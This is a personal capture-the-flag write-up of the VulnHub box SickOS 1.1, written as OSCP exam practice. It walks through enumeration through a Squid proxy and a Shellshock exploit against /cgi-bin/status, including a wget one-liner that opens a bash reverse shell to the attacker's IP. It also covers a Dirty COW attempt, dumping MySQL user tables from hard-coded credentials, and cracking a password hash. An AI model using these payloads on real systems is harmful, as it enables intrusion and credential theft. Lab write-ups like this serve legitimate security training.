/ ctf

CTF / Boot2Root / Sick Os 1.1

If you've not figured out, this is a write-up and will contain spoilers

NOTES

Part of my OSCP pre-pwk-pre-exam education path, this is one of many recommended unofficial practice boxes. SickOs details (https://www.vulnhub.com/entry/sickos-11,132/). I'm not a professional penetration tester and I'll probably fall down many rabbit holes but these are my notes and thought process.

I'll follow this official OSCP exam guide and avoid using Metasploit as much as possible to aid my learning. See notes below;

OSCP Metasploit Usage

You can only use Metasploit Auxiliary, Exploit, and Post modules against one target machine of your choice.
You may use the following against all of the target machines:

  • multi handler (aka exploit/multi/handler)
  • msfvenom
  • pattern_create.rb
  • pattern_offset.rb
OSCP Exam Restrictions

You cannot use any of the following on the exam:

  • Spoofing (IP, ARP, DNS, NBNS, etc)
  • Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
  • Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)
  • Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)
  • Features in other tools that utilize either forbidden or restricted exam limitations

This VM including write-up took ~6 hrs over 3 days (part time) hence the SickOS IP changing in the screenshots. I used OneNote for screenshots/note taking and Kali 64 bit Mate.

Something to listen to: Atomic Blonde ST

KALI SETUP NOTES

Personal preferences

set unlimited terminal scroll back
set copy on highlight
:set paste in VIM when pasting code / auto code indentation is the devil.

ENUMERATION

Start the VM up and it'll gather a DHCP lease. Use arp-scan to query the network for the unknown IP address of box. The :c2 MAC address matches the VM SickOS box configuration. so .132 looks good to me.

enum

Perform an nmap scan of found SickOS host. My normal choice is either;

[email protected]:~# nmap -sS -p- 192.168.147.132
[email protected]:~# nmap -T4 -A -p- 192.168.147.132

A SQUID proxy service is active. Set this up in FoxyProxy in Firefox and browse.

Opening up a session to the web server now results

/robots.txt results in a WolfCMS directory. Noted.

Brute force the web server with dirb and a basic dictionary of common/default directories.

[email protected]:~# dirb http://10.0.0.244 /usr/share/wordlists/dirb/small.txt -p http://10.0.0.244:3128

Also found this connect.py script in the WWWROOT. Noted.

Onto the next tool of choice; Nikto - Web Vulnerability Scanner (proxy supported).

[email protected]:~# nikto -host=http://192.168.147.132/ --useproxy=http://192.168.147.132:3128

The interesting finds here are the /cgi-bin/status - vulnerable to ShellShock.

EXPLOITATION

My next attempt was to use commix for some basic exploitation of /cgi-bin/ with the Shellshock module - i hadn't used this before. It resulted in nothing - assuming I hadn't configured it correctly - it was a new tool I was trying out and wanted to move on quickly.

Reverted to Google to find a few manual methods using wget/curl I've seen in the wild and have used in past CTFs. Just to see if we have execution I attempt to pull back SickOS's /etc/passwd

Now to adapt it to a reverse shell and to set the netcat listener up locally.

[email protected]:~# nc -lvvnp 4444

remember to set the proxy variable in bash.

[email protected]:~# export http_proxy=192.168.147.132:3128

Run the exploit

[email protected]:~# wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >& /dev/tcp/192.168.147.128/4444 0>&1" http://192.168.147.132/cgi-bin/status

Shell. \o/

PRIVILEGE ESCALATION

Now start enumerating the system from within.
Followed for guidance;

Easy credentials found in CMS config.php for MySQL database. Noted.

define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');

GCC Compiler is available, useful for building exploits

Also, a backup directory is found but is not readable by WWW-DATA.

Version of MySQL

I decided to try out a script I came across recently. So uploaded @rebootuser's lin-enum.sh script to speed up the enumeration process. https://raw.githubusercontent.com/sneakymonk3y/LinEnum/master/LinEnum.sh. I did this by using Python's simple HTTP server

then requesting files from the SickOS box using wget.

lin-enum output includes an handy OS overview including kernel levels which can be used when searching vulnerability databases (exploit-db).

Bingo. I had already figured most of these out already. These are dangerous to have on your production system so we are on the right lines already.

Uploaded linux-exploit-suggestor.sh by MZET. https://github.com/mzet-
forked https://github.com/sneakymonk3y/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh.

Noted output...

Exploits I've heard of and easily available via https://dirtycow.ninja/ and https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs. To back this up, searching Google for "Linux kernel 3.11 priv esc" resulted in same exploit;


Section of the code.

I think i'll stick with Dirty COW as my priv esc for now.
https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c

After sending the exploit code over and compiling it, it crashed. Compiling the code and then sending the payload it didn't run.

Tried recompiling a few different versions but hit issues. Moving on and back to the WolfCMS / MySQL credentials from earlier. Poking the CMS results in a login form. I tried a few quick SQLi checks but the form had sanitised the input.

dirty cow code snippet

Connecting to the MySQL database with valid credentials


// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
define('TABLE_PREFIX', '');

Upon connecting and then disconnecting I noted the strange MySQL shell behaviour. Only after I quit the previous output is displayed. I can only assume this is to do with the reverse shell redirection. Never the less I can still work with this.

Quick google on MySQL commands https://gist.github.com/hofmannsven/9164408

show databases; use wolf; show tables; 

[email protected]:/tmp$ mysql -u root -p wolf
Enter password: [email protected]
use wolf; show tables; SELECT * FROM user;
quit

user_role id	name	email	username	password	salt	language	last_login	last_failure	failure_count	created_on	updated_on	created_by_id	updated_by_id
1	Administrator	[email protected]	admin	3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f	6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167	en	2015-12-05 07:47:16	NULL	0	2015-12-05 06:25:06	2015-12-05 07:47:16	1	NULL

[email protected]:/tmp$   

Hmmm salted hashed password. Moving onto the MySQL 'user' database.

use mysql; show tables; SELECT * FROM user;

Results in way more credentials!


Quick analysis via GCHQ's Cyber Chef (offline version also available)
https://gchq.github.io/CyberChef/#recipe=Analyse_hash()&input=QTdBMjBCOTNFQzA3NjMxMUE2M0JGODZCNUM3MDVCMjVDMDU0REQ3Nw which results in a suspect SHA1 hash.

Hash length: 40
Byte length: 20
Bit length:  160

Based on the length, this hash could have been generated by one of the following hashing functions:
SHA-1
SHA-0
FSB-160
HAS-160
HAVAL-160
RIPEMD-160
Tiger-160

For this hash [A7A20B93EC076311A63BF86B5C705B25C054DD77] i'll just upload to https://crackstation.net. WIN! already cracked ;) - and is the same password as earlier!

FINAL NOTES

I don't believe I had the password all along, was side tracked by attempting the Dirty COW priv esc and the WolfCMS admin panel before hitting the MySQL user database tables! For me, remembering to spray found credentials against exposed services for quick wins early on. Preventing rabbit holing is something I'll learn with time, gut feeling and all.

Finally got commix to work too. Was missing http:// of the proxy argument. I guessed right, misconfigured. :)

~Mark

via GIPHY

TL:DR

Exploit the Apache web server with Shellshock https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, enumerate the local hard-coded MySQL database account to pull other database user accounts that can be re-used to log in via SSH to gain root.

Other notable solutions;
https://crowdshield.com/blog.php?name=sickos-1.1-solution-by-1n3
http://www.security-exposed.com/2017/01/sickos-11.html